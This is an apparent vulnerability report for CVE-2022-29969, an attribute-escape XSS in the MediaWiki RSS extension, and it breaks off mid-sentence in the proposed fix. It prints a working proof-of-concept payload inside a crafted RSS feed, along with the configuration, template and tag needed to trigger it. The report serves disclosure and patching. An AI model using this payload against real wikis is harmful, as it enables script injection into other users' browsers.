CVE-2022-29969
This is a WMF deployed extension, however $wgRSSAllowLinkTag is false on cluster, so it is not vulnerable in the configuration used by WMF.
RSS extension implementation of strip markers suffers from a similar problem as MW core's used to before T110143 was fixed. When $wgRSSAllowLinkTag is set to true, you can use this to escape from an attribute.
As an example:
- Set $wgRSSAllowLinkTag = true;
Create an rss feed as follows:
<?xml version="1.0" encoding="UTF-8"?><rss version="2.0" > <channel> <title>Test</title> <item> <title>First item</title> <link>https://example.com</link> <description><![CDATA[<a title="tabindex=1 autofocus onmouseover=alert(1) onfocus=blur() onblur=alert(document.domain)//"> Should autotrigger on chrome, and trigger on hover on firefox</a> ]]></description> </item> </channel> </rss>
- Be sure the above RSS feed is added to $wgRSSUrlWhitelist
- Create a template named Template:RSS containing only
<div title="{{{description}}}"></div>- Use the following tag on a page <rss templatename=RSS>http://address.of.rss.feed.from.above</rss>
This should make an XSS that autotriggers on chrome, and triggers on hoover in firefox.
Best solution, is to probably copy what MW core does for strip markers with them including "'